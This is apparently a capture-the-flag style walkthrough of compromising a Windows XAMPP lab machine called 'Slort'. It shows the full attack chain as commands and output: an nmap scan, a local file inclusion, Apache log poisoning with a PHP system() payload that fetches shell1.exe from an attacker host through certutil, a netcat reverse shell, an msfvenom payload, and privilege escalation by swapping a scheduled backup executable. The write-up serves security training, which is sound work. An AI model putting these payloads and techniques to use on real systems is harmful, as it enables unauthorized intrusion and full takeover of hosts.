Nmap scan
╰─$ nmap -sV -sC -oA slort 192.168.180.53 -Pn
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-08 02:17 EDT
Nmap scan report for 192.168.180.53
Host is up (0.28s latency).
Not shown: 993 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
21/tcp open ftp FileZilla ftpd 0.9.41 beta
| ftp-syst:
|_ SYST: UNIX emulated by FileZilla
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3306/tcp open mysql?
| fingerprint-strings:
| LDAPSearchReq, NULL, oracle-tns:
|_ Host ‘192.168.45.236’ is not allowed to connect to this MariaDB server
4443/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-title: Welcome to XAMPP
|_Requested resource was http://192.168.180.53:4443/dashboard/
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
8080/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
| http-title: Welcome to XAMPP
|_Requested resource was http://192.168.180.53:8080/dashboard/
|_http-open-proxy: Proxy might be redirecting requests
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.94%I=7%D=10/8%Time=65224999%P=x86_64-pc-linux-gnu%r(NU
SF:LL,4D,"I\0\0\x01\xffj\x04Host\x20’192.168.45.236’\x20is\x20not\x20al
SF:lowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(LDAPSearc
SF:hReq,4D,"I\0\0\x01\xffj\x04Host\x20’192.168.45.236’\x20is\x20not\x20
SF:allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(oracle-
SF:tns,4D,"I\0\0\x01\xffj\x04Host\x20’192.168.45.236’\x20is\x20not\x20a
SF:llowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2023-10-08T06:18:30
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
|_clock-skew: 1s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 72.20 seconds
craig Davidson
Jane Simpson
Richard Wilson
We enumarat site using FFUF
on checking http://192.168.180.53:8080/site/ and looking around we get nothing but when i try "http://192.168.180.53:8080/site/index.php?page=xxx" we get
Warning: include(xxx): failed to open stream: No such file or directory in C:\xampp\htdocs\site\index.php on line 4
Warning: include(): Failed opening 'xxx' for inclusion (include_path='C:\xampp\php\PEAR') in C:\xampp\htdocs\site\index.php on line 4
if we try wim.ini and we get the output — http://192.168.180.53:8080/site/index.php?page=C:\Windows\win.ini
; for 16-bit app support [fonts] [extensions] [mci extensions] [files] [Mail] MAPI=1
which copnfirms LFI
we test with the viewing apache logs http://192.168.180.53:8080/site/index.php?page=C:\xampp\apache\logs\access.log
192.168.118.6 - - [23/Jun/2020:19:47:53 -0700] "GET /site/index.php?page=http://192.168.118.6/pwn1.php HTTP/1.1" 200 98 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0" 192.168.118.6 - - [23/Jun/2020:19:48:15 -0700] "GET /site/index.php?page=http://192.168.118.6/pwn2.php HTTP/1.1" 200 138 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0" 192.168.45.236 - - [08/Oct/2023:01:22:44 -0700] "GET /site HTTP/1.1" 400 325 "-" "-" 192.168.45.236 - - [08/Oct/2023:01:22:55 -0700] "GET /site/index.php?page=C:\\xamp
We do log poisoning
we use curl to add this to the log header
╰─$ curl -H "User-Agent: <?php system('certutil.exe -urlcache -split -f "http://192.168.45.236/shell1.exe" shell1.exe'); ?>" http://192.168.180.53:8080/site
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://192.168.180.53:8080/site/">here</a>.</p>
<hr>
<address>Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6 Server at 192.168.180.53 Port 8080</address>
</body></html>
then we run http://192.168.180.53:8080/site/index.php?page=C:\xampp\apache\logs\access.log
Firefox/115.0" 192.168.45.236 - - [08/Oct/2023:02:54:21 -0700] "GET /site HTTP/1.1" 301 346 "-" "**** Online **** CertUtil: -URLCache command completed successfully.
We then curl the command to run the shell
╭─kali@kali ~/PG/slort
╰─$ curl -H "User-Agent: <?php system('shell.exe'); ?>" http://192.168.180.53:8080/site
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://192.168.180.53:8080/site/">here</a>.</p>
<hr>
<address>Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6 Server at 192.168.180.53 Port 8080</address>
</body></html>
╭─kali@kali ~/PG/slort
╰─$
we open the log while we have the listener on 4443
we get a shell
╭─kali@kali ~/PG/slort
╰─$ nc -nlvp 4443
listening on [any] 4443 ...
connect to [192.168.45.236] from (UNKNOWN) [192.168.180.53] 51313
Microsoft Windows [Version 10.0.19042.1387]
(c) Microsoft Corporation. All rights reserved.
C:\xampp\htdocs\site>whoami
whoami
slort\rupert
C:\xampp\htdocs\site>
Privesc. Looking around
we see backup folder
PS C:\> cd Backup
cd Backup
PS C:\Backup> dir
dir
Directory: C:\Backup
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 6/12/2020 7:45 AM 11304 backup.txt
-a---- 6/12/2020 7:45 AM 73 info.txt
-a---- 6/23/2020 7:49 PM 73802 TFTP.EXE
and reading the info.txt
PS C:\Backup> type info.txt
type info.txt
Run every 5 minutes:
C:\Backup\TFTP.EXE -i 192.168.234.57 get backup.txt
PS C:\Backup>
we see it rubs every 5 minutes
Being a backup, it should run with system priviledegs. we will replace this with our new shell which we will rename to tftp.exe
Create new shell
╰─$ msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=8080 -f exe > shell2.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
╭─kali@kali ~/PG/slort
╰─$
serve and upload
PS C:\Backup> Invoke-WebRequest -Uri http://192.168.45.236:80/shell2.exe -OutFile C:\Backup\shell2.exe
Invoke-WebRequest -Uri http://192.168.45.236:80/shell2.exe -OutFile C:\Backup\shell2.exe
PS C:\Backup> dir
dir
Directory: C:\Backup
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 6/12/2020 7:45 AM 11304 backup.txt
-a---- 6/12/2020 7:45 AM 73 info.txt
-a---- 10/8/2023 1:40 AM 73802 shell.exe
-a---- 10/8/2023 3:37 AM 73802 shell2.exe
-a---- 6/23/2020 7:49 PM 73802 TFTPBACK.EXE
PS C:\Backup> mv shell2.exe TFTP.EXE
mv shell2.exe TFTP.EXE
PS C:\Backup>
set up listener and wait for 5 minutes
After a few minutes we get shell. administrator
listening on [any] 8080 ...
connect to [192.168.45.236] from (UNKNOWN) [192.168.180.53] 51436
Microsoft Windows [Version 10.0.19042.1387]
(c) Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32>whoami
whoami
slort\administrator
C:\WINDOWS\system32>cd ../../
cd ../../
C:\>dir
dir
Volume in drive C has no label.
Volume Serial Number is 6E11-8C59
Directory of C:\
10/08/2023 03:38 AM <DIR> Backup
12/07/2019 02:14 AM <DIR> PerfLogs
05/04/2022 01:06 AM <DIR> Program Files
12/03/2021 09:22 AM <DIR> Program Files (x86)
12/03/2021 09:29 AM <DIR> Users
05/04/2022 01:52 AM <DIR> Windows
06/12/2020 08:11 AM <DIR> xampp
0 File(s) 0 bytes
7 Dir(s) 28,620,115,968 bytes free
C:\>cd Users
cd Users
C:\Users>cd Administrator
cd Administrator